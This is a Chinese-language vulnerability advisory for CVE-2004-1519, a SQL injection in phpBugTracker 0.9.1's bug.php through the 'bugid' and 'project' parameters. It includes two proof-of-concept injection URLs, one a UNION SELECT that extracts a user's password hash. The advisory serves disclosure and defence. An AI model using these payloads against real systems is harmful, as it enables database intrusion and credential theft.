首页 -> 安全研究

安全研究

安全漏洞
phpBT bug.php SQL注入漏洞

发布日期:2004-11-13
更新日期:2004-11-15

受影响系统:
phpBugTracker phpBugTracker 0.9.1
描述:
CVE(CAN) ID: CVE-2004-1519

PHP Bug Traq是一款基于PHP的漏洞跟踪系统。

PHP Bug Traq的'bug.php'没有正确过滤用户提交的URL数据,远程攻击者可以利用这个漏洞获得敏感信息或者更改数据库系统。

'bug.php'没有正确过滤用户提交给'bugid'的数据,提交包含恶意SQL命令或者恶意HTML代码的数据作为参数数据,可更改原有的数据库逻辑,获得敏感信息或者更改数据库系统。

另外'bug.php'对'project'变量数据也缺少充分过滤,存在于上面描述相似漏洞。

<*来源:jessica soules (admin@howdark.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110029315521568&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=110037408101974&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

jessica soules (admin@howdark.com)提供了如下测试方法:

http://www.phpbb.com/bugs/bug.php?op=viewvotes&bugid=1 union select 1,user_password,3 \
where user_id='2'/*

bug.php?op=add&project=0%20union%20select%201

建议:
厂商补丁:

phpBugTracker
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://phpbt.sourceforge.net/

浏览次数:3693
严重程度:10(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障